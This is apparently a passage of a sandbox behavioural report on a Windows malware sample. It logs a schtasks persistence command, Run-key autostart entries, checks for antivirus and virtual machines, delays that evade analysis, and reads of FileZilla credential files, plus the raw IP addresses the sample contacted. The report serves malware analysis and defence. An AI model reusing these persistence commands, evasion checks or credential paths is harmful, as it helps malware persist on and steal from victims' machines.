RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (5 events)

host	141.94.192.217
host	77.91.124.47
host	77.91.124.84
host	77.91.68.248
host	77.91.68.61

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService July 27, 2023, 10:24 a.m.	service_handle: 0x000000001a90ce50 service_name: None control_code: 1		0	0
ControlService July 27, 2023, 10:24 a.m.	service_handle: 0x000000001a90d090 service_name: None control_code: 1		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 27, 2023, 10:25 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	ohcompetitive.exe tried to sleep 2728223 seconds, actually delayed analysis time by 2728223 seconds
description	pdates.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds

Installs itself for autorun at Windows startup (14 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto5566.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod250.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\an.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000011051\an.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\raman.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle July 27, 2023, 10:24 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle July 27, 2023, 10:24 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (50 out of 114 events)

Time & API	Arguments	Status
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
